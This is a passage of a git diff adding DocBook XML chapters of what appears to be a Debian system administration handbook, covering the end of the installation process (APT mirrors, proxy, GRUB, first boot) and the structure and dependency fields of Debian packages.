+      <para>This step, which doesn't require any user interaction, installs
+      the Debian “base system” packages. This includes the
+      <command>dpkg</command> and <command>apt</command> tools, which
+      manage Debian packages, as well as the utilities necessary to boot
+      the system and start using it.</para>
+
+      <figure>
+        <title>Installation of the base system</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/inst-basesystem.png" scalefit="1" width="65%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+    </section>
+    <section>
+      <title>Configuring the Package Manager (<command>apt</command>)</title>
+      <indexterm><primary>configuration</primary><secondary>initial configuration of APT</secondary></indexterm>
+      <indexterm><primary>APT</primary><secondary>initial configuration</secondary></indexterm>
+
+      <para>In order to be able to install additional software, APT needs
+      to be configured and told where to find Debian packages. This step is
+      as automated as possible. It starts with a question asking if it must
+      use a network source for packages, or if it should only look for
+      packages on the CD-ROM.</para>
+
+      <sidebar>
+        <title><emphasis>NOTE</emphasis> Debian CD-ROM in the drive</title>
+
+	<para>If the installer detects a Debian installation disk in the
+	CD/DVD reader, it is not necessary to configure APT to go looking
+	for packages on the network: APT is automatically configured to
+	read packages from a removable media drive. If the disk is part of
+	a set, the software will offer to “explore” other disks in
+	order to reference all of the packages stored on them.</para>
+      </sidebar>
+
+      <para>If getting packages from the network is requested, the next two
+      questions allow to choose a server from which to download these
+      packages, by choosing first a country, then a mirror available
+      in that country (a mirror is a public server hosting copies of all
+      the files of the Debian master archive).</para>
+
+      <figure>
+        <title>Selecting a Debian mirror</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/inst-mirror.png" scalefit="1" width="65%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+
+      <para>Finally, the program proposes to use an HTTP proxy. If there is
+      no proxy, Internet access will be direct. If you type
+      <literal>http://proxy.falcot.com:3128</literal>, APT will use the
+      Falcot <foreignphrase>proxy/cache</foreignphrase>, a “Squid”
+      program. You can find these settings by checking the configurations
+      of a web browser on another machine connected to the same
+      network.</para>
+
+      <para>The files <filename>Packages.xz</filename> and
+      <filename>Sources.xz</filename> are then automatically downloaded to
+      update the list of packages recognized by APT.</para>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> HTTP proxy</title>
+        <indexterm><primary>proxy</primary></indexterm>
+        <indexterm><primary>proxy cache</primary></indexterm>
+        <indexterm><primary>cache, proxy</primary></indexterm>
+        <indexterm><primary>Squid</primary></indexterm>
+
+	<para>An HTTP proxy is a server that forwards an HTTP request for
+	network users. It sometimes helps to speed up downloads by keeping
+	a copy of files that have been transferred through it (we then
+	speak of proxy/cache). In some cases, it is the only means of
+	accessing an external web server; in such cases it is essential to
+	answer the corresponding question during installation for the
+	program to be able to download the Debian packages through
+	it.</para>
+
+	<para>Squid is the name of the server software used by Falcot Corp
+	to offer this service.</para>
+      </sidebar>
+    </section>
+    <section>
+      <title>Debian Package Popularity Contest</title>
+
+      <para>The Debian system contains a package called <emphasis role="pkg">popularity-contest</emphasis>, whose purpose is to compile
+      package usage statistics. Each week, this program collects
+      information on the packages installed and those used recently, and
+      anonymously sends this information to the Debian project servers. The
+      project can then use this information to determine the relative
+      importance of each package, which influences the priority that will
+      be granted to them. In particular, the most “popular” packages
+      will be included in the installation CD-ROM, which will facilitate
+      their access for users who do not wish to download them or to
+      purchase a complete set.</para>
+
+      <para>This package is only activated on demand, out of respect for
+      the confidentiality of users' usage.</para>
+    </section>
+    <section>
+      <title>Selecting Packages for Installation</title>
+
+      <para>The following step allows you to choose the purpose of the
+      machine in very broad terms; the ten suggested tasks correspond to
+      lists of packages to be installed. The list of the packages that will
+      actually be installed will be fine-tuned and completed later on, but
+      this provides a good starting point in a simple manner.</para>
+
+      <para>Some packages are also automatically installed according to the
+      hardware detected (thanks to the program
+      <command>discover-pkginstall</command> from the <emphasis role="pkg">discover</emphasis> package).</para>
+
+      <figure>
+        <title>Task choices</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/inst-tasksel.png" scalefit="1" width="65%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+    </section>
+    <section id="sect.installing-grub">
+      <title>Installing the GRUB Bootloader</title>
+      <indexterm><primary>loader</primary><secondary>bootloader</secondary></indexterm>
+      <indexterm><primary>bootloader</primary></indexterm>
+      <indexterm><primary>GRUB</primary></indexterm>
+
+      <para>The bootloader is the first program started by the BIOS. This
+      program loads the Linux kernel into memory and then executes it. It
+      often offers a menu that allows the user to choose the kernel to load
+      and/or the operating system to boot.</para>
+
+      <sidebar id="sidebar.bootloader-dual-boot">
+        <title><emphasis>BEWARE</emphasis> Bootloader and dual boot</title>
+        <indexterm><primary>dual boot</primary></indexterm>
+
+	<para>This phase in the Debian installation process detects the
+	operating systems that are already installed on the computer, and
+	automatically adds corresponding entries in the boot menu, but not
+	all installation programs do this.</para>
+
+	<para>In particular, if you install (or reinstall) Windows
+	thereafter, the bootloader will be erased. Debian will still be on
+	the hard drive, but will no longer be accessible from the boot
+	menu. You would then have to boot the Debian installation system in
+	<userinput>rescue</userinput> mode to set up a less exclusive
+	bootloader. This operation is described in detail in the
+        installation manual.
+        <ulink type="block" url="http://www.debian.org/releases/stable/amd64/ch08s07.html" />
+        </para>
+      </sidebar>
+
+      <para>By default, the menu proposed by GRUB contains all the
+      installed Linux kernels, as well as any other operating systems
+      that were detected. This is why you should accept the offer to
+      install it in the Master Boot Record. Since keeping older kernel
+      versions preserves the ability to boot the same system if the
+      most recently installed kernel is defective or poorly adapted to
+      the hardware, it often makes sense to keep a few older kernel
+      versions installed.</para>
+
+      <para>GRUB is the default bootloader installed by Debian thanks to
+      its technical superiority: it works with most filesystems and
+      therefore doesn't require an update after each installation of a new
+      kernel, since it reads its configuration during boot and finds the
+      exact position of the new kernel. Version 1 of GRUB (now known as
+      “Grub Legacy”) couldn't handle all combinations of LVM and
+      software RAID; version 2, installed by default, is more complete.
+      There may still be situations where it is more recommendable to
+      install LILO (another bootloader); the installer will suggest it
+      automatically.</para>
+
+      <para>For more information on configuring GRUB, please refer to <xref linkend="sect.config-grub" />.</para>
+
+      <sidebar>
+        <title><emphasis>BEWARE</emphasis> Bootloaders and architectures</title>
+
+	<para>LILO and GRUB, which are mentioned in this chapter, are
+	bootloaders for <emphasis>i386</emphasis> and
+	<emphasis>amd64</emphasis> architectures. If you install Debian on
+	another architecture, you will need to use another bootloader.
+	Among others, we can cite <command>yaboot</command> or
+	<command>quik</command> for <emphasis>powerpc</emphasis>,
+	<command>silo</command> for <emphasis>sparc</emphasis>,
+	<command>aboot</command> for <emphasis>alpha</emphasis>,
+	<command>arcboot</command> for <emphasis>mips</emphasis>.
+	</para>
+      </sidebar>
+    </section>
+    <section>
+      <title>Finishing the Installation and Rebooting</title>
+
+      <para>The installation is now complete, the program invites you to
+      remove the CD-ROM from the reader and to restart the computer.</para>
+    </section>
+  </section>
+  <section id="sect.after-first-boot">
+    <title>After the First Boot</title>
+
+    <para>If you activated the task “Debian desktop environment” without any
+    explicit desktop choice (or with the “GNOME” choice), the computer
+    will display the <command>gdm3</command> login manager.</para>
+
+    <figure>
+      <title>First boot</title>
+      <mediaobject>
+        <imageobject>
+          <imagedata fileref="images/inst-gdm.png" scalefit="1" width="65%" />
+        </imageobject>
+      </mediaobject>
+    </figure>
+
+    <para>The user that has already been created can then log in and begin
+    working immediately.</para>
+    <section>
+      <title>Installing Additional Software</title>
+
+      <para>The installed packages correspond to the profiles selected
+      during installation, but not necessarily to the use that will
+      actually be made of the machine. As such, you might want to use
+      a package management tool to refine the selection of installed
+      packages. The two most frequently used tools (which are
+      installed if the “Debian desktop environment” profile was
+      chosen) are <command>apt</command> (accessible from the command
+      line) and <command>synaptic</command> (“Synaptic Package Manager” in
+      the menus).</para>
+
+      <para>To facilitate the installation of coherent groups of programs,
+      Debian creates “tasks” that are dedicated to specific uses (mail
+      server, file server, etc.). You already had the opportunity to select
+      them during installation, and you can access them again thanks to
+      package management tools such as <command>aptitude</command> (the
+      tasks are listed in a distinct section) and
+      <command>synaptic</command> (through the menu <menuchoice>
+      <guimenu>Edit</guimenu> <guimenuitem>Mark Packages by
+      Task…</guimenuitem> </menuchoice>).</para>
+
+      <para>Aptitude is an interface to APT in full-screen text mode. It
+      allows the user to browse the list of available packages according to
+      various categories (installed or not-installed packages, by task, by
+      section, etc.), and to view all of the information available on each
+      of them (dependencies, conflicts, description, etc.). Each package
+      can be marked “install” (to be installed, <keycap>+</keycap> key)
+      or “remove” (to be removed, <keycap>-</keycap> key). All of these
+      operations will be conducted simultaneously once you've confirmed
+      them by pressing the <keycap>g</keycap> key (“g” for “go!”).
+      If you have forgotten some programs, no worries; you will be able to
+      run <command>aptitude</command> again once the initial installation
+      has been completed.</para>
+      <indexterm><primary>aptitude</primary></indexterm>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> Debian thinks of speakers of non-English languages</title>
+
+	<para>Several tasks are dedicated to the localization of the system
+	in other languages beyond English. They include translated
+	documentation, dictionaries, and various other packages useful for
+	speakers of different languages. The appropriate task is
+	automatically selected if a non-English language was chosen during
+	installation.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> <command>dselect</command>, the old interface to install packages</title>
+
+	<para>Before <command>aptitude</command>, the standard program to
+	select packages to be installed was <command>dselect</command>, the
+	old graphical interface associated with <command>dpkg</command>. Being a
+	difficult program for beginners to use, it is not
+	recommended.</para>
+        <indexterm><primary><command>dselect</command></primary></indexterm>
+      </sidebar>
+
+      <para>Of course, it is possible not to select any task to be
+      installed. In this case, you can manually install the desired
+      software with the <command>apt</command> or
+      <command>aptitude</command> command (which are both accessible from
+      the command line).</para>
+
+      <sidebar>
+        <title><emphasis>VOCABULARY</emphasis> Package dependencies, conflicts</title>
+
+	<para>In the Debian packaging lingo, a “dependency” is another
+	package necessary for the proper functioning of the package in
+	question. Conversely, a “conflict” is a package that can not be
+	installed side-by-side with another.</para>
+
+	<para>These concepts are discussed in greater detail in <xref linkend="packaging-system" />.</para>
+      </sidebar>
+    </section>
+    <section>
+      <title>Upgrading the System</title>
+      <indexterm><primary>safe-upgrade</primary></indexterm>
+
+      <para>A first <command>apt upgrade</command> (a command
+      used to automatically update installed programs) is generally
+      required, especially for possible security updates issued since the
+      release of the latest Debian stable version. These updates may
+      involve some additional questions through <command>debconf</command>,
+      the standard Debian configuration tool. For further information on
+      these updates conducted by <command>apt</command>, please refer
+      to <xref linkend="sect.apt-upgrade" />.</para>
+    </section>
+  </section>
+</chapter>
diff --git a/tmp/cs-CZ/xml_tmp/05_packaging-system.xml b/tmp/cs-CZ/xml_tmp/05_packaging-system.xml
new file mode 100644
index 000000000..42bfc13aa
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/05_packaging-system.xml
@@ -0,0 +1,1801 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="packaging-system">
+  <chapterinfo>
+    <mediaobject condition="pdf">
+      <imageobject>
+        <imagedata fileref="images/chap-packaging-system.png" scalefit="1" />
+      </imageobject>
+    </mediaobject>
+    <keywordset>
+      <keyword>Binary package</keyword>
+      <keyword>Source package</keyword>
+      <keyword>dpkg</keyword>
+      <keyword>dependencies</keyword>
+      <keyword>conflict</keyword>
+    </keywordset>
+  </chapterinfo>
+  <title>Packaging System: Tools and Fundamental Principles</title>
+  <highlights>
+    <para>As a Debian system administrator, you will routinely handle
+    <filename>.deb</filename> packages, since they contain consistent
+    functional units (applications, documentation, etc.), whose
+    installation and maintenance they facilitate. It is therefore a good
+    idea to know what they are and how to use them.</para>
+  </highlights>
+
+  <para>This chapter describes the structure and contents of “binary”
+  and “source” packages. The former are <filename>.deb</filename>
+  files, directly usable by <command>dpkg</command>, while the latter
+  contain the source code, as well as instructions for building
+  binary packages.</para>
+  <section id="sect.binary-package-structure">
+    <title>Structure of a Binary Package</title>
+    <indexterm><primary>package</primary><secondary>binary package</secondary></indexterm>
+    <indexterm><primary><command>ar</command></primary></indexterm>
+
+    <para>The Debian package format is designed so that its content may be
+    extracted on any Unix system that has the classic commands
+    <command>ar</command>, <command>tar</command>, and
+    <command>xz</command> (sometimes
+    <command>gzip</command> or <command>bzip2</command>). This seemingly
+    trivial property is important for portability and disaster
+    recovery.</para>
+
+    <para>Imagine, for example, that you mistakenly deleted the
+    <command>dpkg</command> program, and that you could thus no longer
+    install Debian packages. <command>dpkg</command> being a Debian package
+    itself, it would seem your system would be done for... Fortunately, you
+    know the format of a package and can therefore download the
+    <filename>.deb</filename> file of the <emphasis role="pkg">dpkg</emphasis> package and install it manually (see sidebar
+    <xref linkend="sidebar.dpkg-apt-ar" />). If by some misfortune one or more of the programs
+    <command>ar</command>, <command>tar</command> or
+    <command>gzip</command>/<command>xz</command>/<command>bzip2</command>
+    have disappeared, you will only need to copy the missing program from
+    another system (since each of these operates in a completely
+    autonomous manner, without dependencies, a simple copy will
+    suffice).  If your system suffered some even more outrageous
+    fortune, and even these don't work (maybe the deepest system
+    libraries are missing?), you should try the static version of
+    <command>busybox</command> (provided in the <emphasis role="pkg">busybox-static</emphasis> package), which is even more
+    self-contained, and provides subcommands such as <command>busybox ar</command>,
+    <command>busybox tar</command> and <command>busybox
+    xz</command>.</para>
+
+    <sidebar id="sidebar.dpkg-apt-ar">
+      <title><emphasis>TOOLS</emphasis> <command>dpkg</command>, <command>APT</command> and <command>ar</command></title>
+      <indexterm><primary><command>dpkg</command></primary></indexterm>
+      <indexterm><primary><command>ar</command></primary></indexterm>
+      <indexterm><primary>APT</primary></indexterm>
+
+      <para><command>dpkg</command> is the program that handles
+      <filename>.deb</filename> files, notably extracting, analyzing, and
+      unpacking them.</para>
+
+      <para><command>APT</command> is a group of programs that allows the
+      execution of higher-level modifications to the system: installing or
+      removing a package (while keeping dependencies satisfied), updating
+      the system, listing the available packages, etc.</para>
+    
+      <indexterm><primary><command>ar</command></primary></indexterm>
+      <para>
+      As for the <command>ar</command> program, it allows handling files of
+      the same name: <command>ar t
+      <replaceable>archive</replaceable></command> displays the list of
+      files contained in such an archive, <command>ar x
+      <replaceable>archive</replaceable></command> extracts the files from
+      the archive into the current working directory, <command>ar d
+      <replaceable>archive</replaceable>
+      <replaceable>file</replaceable></command> deletes a file from the
+      archive, etc. Its man page
+      (<citerefentry><refentrytitle>ar</refentrytitle><manvolnum>1</manvolnum></citerefentry>)
+      documents all its other features. <command>ar</command> is a very
+      rudimentary tool that a Unix administrator would only use on rare
+      occasions, but admins routinely use <command>tar</command>, a more
+      evolved archive and file management program. This is why it is easy
+      to restore <command>dpkg</command> in the event of an erroneous
+      deletion. You would only have to download the Debian package and
+      extract the content from the <filename>data.tar.xz</filename> archive
+      in the system's root (<filename>/</filename>):</para>
+
+      <screen>
+<computeroutput># </computeroutput><userinput>ar x dpkg_1.18.24_amd64.deb</userinput>
+<computeroutput># </computeroutput><userinput>tar -C / -p -xJf data.tar.xz</userinput>
+</screen>
+    </sidebar>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> Man page notation</title>
+
+      <para>It can be confusing for beginners to find references to
+      “<citerefentry><refentrytitle>ar</refentrytitle><manvolnum>1</manvolnum></citerefentry>”
+      in the literature. This is generally a convenient means of referring
+      to the man page entitled <literal>ar</literal> in section 1.</para>
+
+      <para>Sometimes this notation is also used to remove ambiguities, for
+      example to distinguish between the <command>printf</command> command
+      that can also be indicated by
+      <citerefentry><refentrytitle>printf</refentrytitle><manvolnum>1</manvolnum></citerefentry>
+      and the <function>printf</function> function in the C programming
+      language, which can also be referred to as
+      <citerefentry><refentrytitle>printf</refentrytitle><manvolnum>3</manvolnum></citerefentry>.</para>
+
+      <para><xref linkend="solving-problems" /> discusses manual pages in
+      further detail (see <xref linkend="sect.manual-pages" />).</para>
+    </sidebar>
+
+    <para>Have a look at the content of a <filename>.deb</filename>
+    file:</para>
+
+    <screen><computeroutput>$ </computeroutput><userinput>ar t dpkg_1.18.24_amd64.deb</userinput>
+<computeroutput>debian-binary
+control.tar.gz
+data.tar.xz
+$ </computeroutput><userinput>ar x dpkg_1.18.24_amd64.deb</userinput>
+<computeroutput>$ </computeroutput><userinput>ls</userinput>
+<computeroutput>control.tar.gz  data.tar.xz  debian-binary  dpkg_1.18.24_amd64.deb
+$ </computeroutput><userinput>tar tJf data.tar.xz | head -n 15</userinput>
+<computeroutput>./
+./etc/
+./etc/alternatives/
+./etc/alternatives/README
+./etc/cron.daily/
+./etc/cron.daily/dpkg
+./etc/dpkg/
+./etc/dpkg/dpkg.cfg
+./etc/dpkg/dpkg.cfg.d/
+./etc/logrotate.d/
+./etc/logrotate.d/dpkg
+./sbin/
+./sbin/start-stop-daemon
+./usr/
+./usr/bin/
+$ </computeroutput><userinput>tar tzf control.tar.gz</userinput>
+<computeroutput>./
+./conffiles
+./postinst
+./md5sums
+./prerm
+./control
+./postrm
+$ </computeroutput><userinput>cat debian-binary</userinput>
+<computeroutput>2.0</computeroutput>
+</screen>
+
+    <para>As you can see, the <command>ar</command> archive of a Debian
+    package is comprised of three files:</para>
+    <itemizedlist>
+      <listitem>
+	<para><filename>debian-binary</filename>. This is a text file which
+	simply indicates the version of the <filename>.deb</filename> file
+	used (in 2017: version 2.0).</para>
+      </listitem>
+      <listitem>
+	<para><filename>control.tar.gz</filename>. This archive file
+	contains all of the available meta-information, like the name and
+	version of the package. Some of this meta-information allows
+	package management tools to determine if it is possible to install
+	or uninstall it, for example according to the list of packages
+	already on the machine.</para>
+      </listitem>
+      <listitem>
+	<para><filename>data.tar.xz</filename>. This archive contains all
+	of the files to be extracted from the package; this is where the
+	executable files, documentation, etc., are all stored. Some
+	packages may use other compression formats, in which case the file
+	will be named differently (<filename>data.tar.bz2</filename> for
+	bzip2, <filename>data.tar.gz</filename> for gzip).</para>
+      </listitem>
+    </itemizedlist>
+  </section>
+
+  <section id="sect.package-meta-information">
+    <title>Package Meta-Information</title>
+    <indexterm><primary>package meta-information</primary></indexterm>
+    <indexterm><primary>package</primary><secondary>meta-information</secondary></indexterm>
+
+    <para>The Debian package is not only an archive of files intended
+    for installation. It is part of a larger whole, and it describes
+    its relationship with other Debian packages (dependencies,
+    conflicts, suggestions). It also provides scripts that enable the
+    execution of commands at different stages in the package's
+    lifecycle (installation, removal, upgrades). These data are used
+    by the package management tools but are not part of the packaged
+    software; they are, within the package, what is called its
+    “meta-information” (information about other information).</para>
+
+    <section id="sect.control">
+      <title>Description: the <filename>control</filename> File</title>
+      <indexterm><primary>package meta-information</primary></indexterm>
+      <indexterm><primary>package</primary><secondary>meta-information</secondary></indexterm>
+      <indexterm><primary><filename>control</filename></primary></indexterm>
+
+      <para>This file uses a structure similar to email headers (as defined
+      by RFC 2822). For example, for <emphasis role="pkg">apt</emphasis>,
+      the <filename>control</filename> file looks like the
+      following:</para>
+
+      <screen>
+<computeroutput>$ </computeroutput><userinput>apt-cache show apt</userinput>
+<computeroutput>Package: apt
+Version: 1.4.8
+Installed-Size: 3539
+Maintainer: APT Development Team &lt;deity@lists.debian.org&gt;
+Architecture: amd64
+Replaces: apt-utils (&lt;&lt; 1.3~exp2~)
+Depends: adduser, gpgv | gpgv2 | gpgv1, debian-archive-keyring, init-system-helpers (&gt;= 1.18~), libapt-pkg5.0 (&gt;= 1.3~rc2), libc6 (&gt;= 2.15), libgcc1 (&gt;= 1:3.0), libstdc++6 (&gt;= 5.2)
+Recommends: gnupg | gnupg2 | gnupg1
+Suggests: apt-doc, aptitude | synaptic | wajig, dpkg-dev (&gt;= 1.17.2), powermgmt-base, python-apt
+Breaks: apt-utils (&lt;&lt; 1.3~exp2~)
+Description-en: commandline package manager
+ This package provides commandline tools for searching and
+ managing as well as querying information about packages
+ as a low-level access to all features of the libapt-pkg library.
+ .
+ These include:
+  * apt-get for retrieval of packages and information about them
+    from authenticated sources and for installation, upgrade and
+    removal of packages together with their dependencies
+  * apt-cache for querying available information about installed
+    as well as installable packages
+  * apt-cdrom to use removable media as a source for packages
+  * apt-config as an interface to the configuration settings
+  * apt-key as an interface to manage authentication keys
+Description-md5: 9fb97a88cb7383934ef963352b53b4a7
+Tag: admin::package-management, devel::lang:ruby, hardware::storage,
+ hardware::storage:cd, implemented-in::c++, implemented-in::perl,
+ implemented-in::ruby, interface::commandline, network::client,
+ protocol::ftp, protocol::http, protocol::ipv6, role::program,
+ scope::application, scope::utility, sound::player, suite::debian,
+ use::downloading, use::organizing, use::searching, works-with::audio,
+ works-with::software:package, works-with::text
+Section: admin
+Priority: important
+Filename: pool/main/a/apt/apt_1.4.8_amd64.deb
+Size: 1231676
+MD5sum: 4963240f23156b2dda3affc9c0d416a3
+SHA256: bc319a3abaf98d76e7e13ac97ab0ee7c238a48e2d4ab85524be8b10cfd23d50d</computeroutput>
+</screen>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> RFC — Internet standards</title>
+        <indexterm><primary>RFC</primary></indexterm>
+        <indexterm><primary>Request For Comments</primary></indexterm>
+
+	<para>RFC is the abbreviation of “Request For Comments”. An RFC
+	is generally a technical document that describes what will become
+	an Internet standard. Before becoming standardized and frozen,
+	these standards are submitted for public review (hence their name).
+	The IETF (Internet Engineering Task Force) decides on the evolution
+	of the status of these documents (proposed standard, draft
+	standard, or standard).</para>
+
+	<para>RFC 2026 defines the process for standardization of Internet
+	protocols. <ulink type="block" url="http://www.faqs.org/rfcs/rfc2026.html" /></para>
+      </sidebar>
+      <section>
+        <title>Dependencies: the <literal>Depends</literal> Field</title>
+        <indexterm><primary>dependency</primary></indexterm>
+        <indexterm><primary><literal>Depends</literal>, header field</primary></indexterm>
+        <indexterm><primary>package</primary><secondary>dependency</secondary></indexterm>
+
+	<para>The dependencies are defined in the
+	<literal>Depends</literal> field in the package header. This
+	is a list of conditions to be met for the package to work
+	correctly — this information is used by tools such as
+	<command>apt</command> in order to install the required
+	libraries, in appropriate versions fulfilling the dependencies
+	of the package to be installed. For each dependency, it is
+	possible to restrict the range of versions that meet that
+	condition. In other words, it is possible to express the fact
+	that we need the package <emphasis role="pkg">libc6</emphasis>
+	in a version equal to or greater than “2.15” (written
+	“<command>libc6 (&gt;= 2.15)</command>”). Version comparison
+	operators are as follows:</para>
+        <itemizedlist>
+          <listitem>
+	    <para><command>&lt;&lt;</command>: less than;</para>
+          </listitem>
+          <listitem>
+	    <para><command>&lt;=</command>: less than or equal to;</para>
+          </listitem>
+          <listitem>
+	    <para><command>=</command>: equal to (note that
+	    “<literal>2.6.1</literal>” is not equal to
+	    “<literal>2.6.1-1</literal>”);</para>
+          </listitem>
+          <listitem>
+	    <para><command>&gt;=</command>: greater than or equal
+	    to;</para>
+          </listitem>
+          <listitem>
+	    <para><command>&gt;&gt;</command>: greater than.</para>
+          </listitem>
+        </itemizedlist>
+
+	<para>In a list of conditions to be met, the comma serves as a
+	separator. It must be interpreted as a logical “and”.
+	In conditions, the vertical bar (“|”) expresses a logical “or”
+	(it is an inclusive “or”, not an exclusive
+	“either/or”). Carrying greater priority than “and”, it can
+	be used as many times as necessary. Thus, the dependency “(A or
+	B) and C” is written <command>A | B, C</command>. In contrast,
+	the expression “A or (B and C)” should be written as “(A or
+	B) and (A or C)”, since the <literal>Depends</literal> field does
+	not tolerate parentheses that change the order of priorities
+	between the logical operators “or” and “and”. It would thus
+	be written <command>A | B, A | C</command>. <ulink type="block" url="https://www.debian.org/doc/debian-policy/#document-ch-relationships" /></para>
+
+        <indexterm><primary>meta-package</primary></indexterm>
+	<para>The dependencies system is a good mechanism for guaranteeing
+	the operation of a program, but it has another use with
+	“meta-packages”. These are empty packages that only describe
+	dependencies. They facilitate the installation of a consistent
+	group of programs preselected by the meta-package maintainer; as
+	such, <command>apt install
+	<replaceable>meta-package</replaceable></command> will
+	automatically install all of these programs using the
+	meta-package's dependencies. The <emphasis role="pkg">gnome</emphasis>, <emphasis role="pkg">kde-full</emphasis>
+	and <emphasis role="pkg">linux-image-amd64</emphasis> packages
+	are examples of meta-packages.</para>
+
+        <sidebar>
+          <title><emphasis>DEBIAN POLICY</emphasis> <literal>Pre-Depends</literal>, a more demanding <literal>Depends</literal> </title>
+          <indexterm><primary><literal>Pre-Depends</literal>, header field</primary></indexterm>
+          <indexterm><primary>pre-dependency</primary></indexterm>
+
+	  <para>“Pre-dependencies”, which are listed in the
+	  “<literal>Pre-Depends</literal>” field in the package
+	  headers, complete the normal dependencies; their syntax is
+	  identical. A normal dependency indicates that the package in
+	  question must be unpacked and configured before configuration of the package
+	  declaring the dependency. A pre-dependency stipulates that the
+	  package in question must be unpacked and configured before
+	  execution of the pre-installation script of the package declaring
+	  the pre-dependency, that is before its installation.</para>
+
+	  <para>A pre-dependency is very demanding for
+	  <command>apt</command>, because it adds a strict constraint on
+	  the ordering of the packages to install. As such,
+	  pre-dependencies are discouraged unless absolutely necessary. It
+	  is even recommended to consult other developers on
+	  <email>debian-devel@lists.debian.org</email> before adding a
+	  pre-dependency. It is generally possible to find another solution
+	  as a work-around.</para>
+        </sidebar>
+
+        <sidebar>
+          <title><emphasis>DEBIAN POLICY</emphasis> <literal>Recommends</literal>, <literal>Suggests</literal>, and <literal>Enhances</literal> fields</title>
+          <indexterm><primary><literal>Recommends</literal>, header field</primary></indexterm>
+          <indexterm><primary><literal>Suggests</literal>, header field</primary></indexterm>
+
+	  <para>The <literal>Recommends</literal> and
+	  <literal>Suggests</literal> fields describe dependencies that are
+	  not compulsory. The “recommended” dependencies, the most
+	  important, considerably improve the functionality offered by the
+	  package but are not indispensable to its operation. The
+	  “suggested” dependencies, of secondary importance, indicate
+	  that certain packages may complement and increase their
+	  respective utility, but it is perfectly reasonable to install one
+	  without the others.</para>
+
+	  <para>You should always install the “recommended” packages,
+	  unless you know exactly why you do not need them. Conversely, it
+	  is not necessary to install “suggested” packages unless you
+	  know why you need them.</para>
+
+          <indexterm><primary><literal>Enhances</literal>, header field</primary></indexterm>
+
+	  <para>The <literal>Enhances</literal> field also describes a
+	  suggestion, but in a different context. It is indeed located in
+	  the suggested package, and not in the package that benefits from
+	  the suggestion. Its interest lies in that it is possible to add a
+	  suggestion without having to modify the package that is
+	  concerned. Thus, all add-ons, plug-ins, and other extensions of a
+	  program can then appear in the list of suggestions related to
+	  the software. Although it has existed for several years, this
+	  last field is still largely ignored by programs such as
+	  <command>apt</command> or <command>synaptic</command>. Its
+	  purpose is for a suggestion made by the
+	  <literal>Enhances</literal> field to appear to the user in
+	  addition to the traditional suggestions — found in the
+	  <literal>Suggests</literal> field.</para>
+        </sidebar>
+      </section>
+      <section>
+        <title>Conflicts: the <literal>Conflicts</literal> field</title>
+        <indexterm><primary>conflicts</primary></indexterm>
+        <indexterm><primary><literal>Conflicts</literal>, header field</primary></indexterm>
+        <indexterm><primary>package</primary><secondary>conflict</secondary></indexterm>
+
+	<para>The <literal>Conflicts</literal> field indicates when a
+	package cannot be installed simultaneously with another. The most
+	common reasons for this are that both packages include a file
+	of the same name, or provide the same service on the same
+	TCP port, or would hinder each other's operation.</para>
+
+	<para><command>dpkg</command> will refuse to install a package if
+	it triggers a conflict with an already installed package, except if
+	the new package specifies that it will “replace” the installed
+	package, in which case <command>dpkg</command> will choose to
+	replace the old package with the new one.
+	<command>apt</command> always follows your instructions: if you
+	choose to install a new package, it will automatically offer to
+	uninstall the package that poses a problem.</para>
+      </section>
+      <section>
+        <title>Incompatibilities: the <literal>Breaks</literal> Field</title>
+        <indexterm><primary>incompatibilities</primary></indexterm>
+        <indexterm><primary><literal>Breaks</literal>, header field</primary></indexterm>
+        <indexterm><primary>package</primary><secondary>incompatibility</secondary></indexterm>
+
+	<para>The <literal>Breaks</literal> field has an effect similar to
+	that of the <literal>Conflicts</literal> field, but with a special
+	meaning. It signals that the installation of a package will
+	“break” another package (or particular versions of it). In
+	general, this incompatibility between two packages is transitory,
+	and the <literal>Breaks</literal> relationship specifically refers
+	to the incompatible versions.</para>
+
+	<para><command>dpkg</command> will refuse to install a package that
+	breaks an already installed package, and <command>apt</command>
+	will try to resolve the problem by updating the package that would
+	be broken to a newer version (which is assumed to be fixed and,
+	thus, compatible again).</para>
+
+	<para>This type of situation may occur in the case of updates
+	without backwards compatibility: this is the case if the new
+	version no longer functions with the older version, and causes a
+	malfunction in another program without making special provisions.
+	The <literal>Breaks</literal> field prevents the user from running
+	into these problems.</para>
+      </section>
+      <section>
+        <title>Provided Items: the <literal>Provides</literal> Field</title>
+        <indexterm><primary><literal>Provides</literal>, header field</primary></indexterm>
+
+	<para>This field introduces the very interesting concept of a
+	“virtual package”. It has many roles, but two are of particular
+	importance. The first role consists in using a virtual package to
+	associate a generic service with it (the package “provides” the
+	service). The second indicates that a package completely replaces
+	another, and that for this purpose it can also satisfy the
+	dependencies that the other would satisfy. It is thus possible to
+	create a substitution package without having to use the same
+	package name.</para>
+
+        <sidebar>
+          <title><emphasis>VOCABULARY</emphasis> Meta-package and virtual package</title>
+          <indexterm><primary>meta-package</primary></indexterm>
+          <indexterm><primary>package</primary><secondary>virtual package</secondary></indexterm>
+          <indexterm><primary>virtual package</primary></indexterm>
+
+	  <para>It is essential to clearly distinguish meta-packages from
+	  virtual packages. The former are real packages (including real
+	  <filename>.deb</filename> files), whose only purpose is to
+	  express dependencies.</para>
+
+	  <para>Virtual packages, however, do not exist physically; they
+	  are only a means of identifying real packages based on common,
+	  logical criteria (service provided, compatibility with a standard
+	  program or a pre-existing package, etc.).</para>
+        </sidebar>
+        <section>
+          <title>Providing a “Service”</title>
+
+	  <para>Let us discuss the first case in greater detail with
+	  an example: all mail servers, such as <emphasis role="pkg">postfix</emphasis> or <emphasis role="pkg">sendmail</emphasis> are said to “provide” the
